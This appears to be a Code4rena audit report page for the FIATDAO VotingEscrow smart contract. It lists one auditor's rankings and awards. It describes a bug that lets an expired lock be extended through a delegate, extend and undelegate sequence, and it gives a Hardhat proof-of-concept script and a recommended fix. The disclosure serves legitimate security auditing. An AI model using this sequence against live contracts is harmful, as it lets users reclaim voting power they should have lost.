Platform: Code4rena
Start Date: 12/08/2022
Pot Size: $35,000 USDC
Total HM: 10
Participants: 126
Period: 3 days
Judge: Justin Goro
Total Solo HM: 3
Id: 154
League: ETH
Rank: 9/126
Findings: 2
Award: $571.54
π Selected for report: 1
π Solo Findings: 0
π Selected for report: KIntern_NA
541.6482 USDC - $541.65
https://github.com/code-423n4/2022-08-fiatdao/blob/main/contracts/VotingEscrow.sol#L493-L523
Can not prevent expired locks being extended.
https://github.com/code-423n4/2022-08-fiatdao/blob/main/contracts/VotingEscrow.sol#L493-L523
Call function function increaseUnlockTime() with an expired lock (locked[msg.sender].end < block.timestamp)
But in case 1, senderβs lock was not delegated to another, the sender can delegate to new address with end time of lock equal to new end time. After that he can call increaseUnlockTime() and move to case 2. Then sender can undelegate and the lock will be extended, and sender will take back vote power.
Here is the script :
describe("voting escrow", async () => { it("increase unlock time issue", async () => { await createSnapshot(provider); //alice creates lock let lockTime = WEEK + (await getTimestamp()); await ve.connect(alice).createLock(lockAmount, lockTime); // bob creates lock lockTime = 50 * WEEK + (await getTimestamp()); await ve.connect(bob).createLock(10 ** 8, lockTime); //pass 1 week, alice's lock is expired await ethers.provider.send("evm_mine", [await getTimestamp() + WEEK]); expect(await ve.balanceOf(alice.address)).to.eq(0); //alice can not increase unlock timme await expect(ve.connect(alice).increaseUnlockTime(lockTime)).to.be.revertedWith("Lock expired"); //alice delegate to bob then can increase unlock time await ve.connect(alice).delegate(bob.address); await expect(ve.connect(alice).increaseUnlockTime(lockTime)).to.not.be.reverted; //alice delegate back herself await ve.connect(alice).delegate(alice.address); expect(await ve.balanceOf(alice.address)).to.gt(0); });
Manual review
In every cases, expired locks should able to be extended -> should remove line https://github.com/code-423n4/2022-08-fiatdao/blob/main/contracts/VotingEscrow.sol#L511
#0 - gititGoro
2022-09-03T01:32:48Z
Very good report, especially because of that script.
π Selected for report: oyc_109
Also found by: 0x1f8b, 0x52, 0xDjango, 0xLovesleep, 0xNazgul, 0xNineDec, 0xbepresent, 0xmatt, 0xsolstars, Aymen0909, Bahurum, Bnke0x0, CertoraInc, Chom, CodingNameKiki, DecorativePineapple, Deivitto, Dravee, ElKu, Funen, GalloDaSballo, IllIllI, JC, JohnSmith, Junnon, KIntern_NA, Lambda, LeoS, MiloTruck, Noah3o6, PaludoX0, RedOneN, Respx, ReyAdmirado, Rohan16, RoiEvenHaim, Rolezn, Ruhum, Sm4rty, TomJ, Vexjon, Waze, Yiko, __141345__, a12jmx, ajtra, ak1, apostle0x01, asutorufos, auditor0517, bin2chen, bobirichman, brgltd, bulej93, byndooa, c3phas, cRat1st0s, cryptphi, csanuragjain, d3e4, defsec, delfin454000, djxploit, durianSausage, ellahi, erictee, exd0tpy, fatherOfBlocks, gogo, jonatascm, ladboy233, medikko, mics, natzuu, neumo, p_crypt0, paribus, pfapostol, rbserver, reassor, ret2basic, robee, rokinot, rvierdiiev, sach1r0, saneryee, seyni, sikorico, simon135, sseefried, wagmi, wastewa
29.8918 USDC - $29.89
https://github.com/code-423n4/2022-08-fiatdao/blob/main/contracts/VotingEscrow.sol#L414
This comment makes reader misunderstood because from using quitLock(), users must create new lock with function createLock(). If users use increaseAmount, it will be reverted: https://github.com/code-423n4/2022-08-fiatdao/blob/main/contracts/VotingEscrow.sol#L449
should use SafeCast.toInt128(int256()) instead of int128(int256())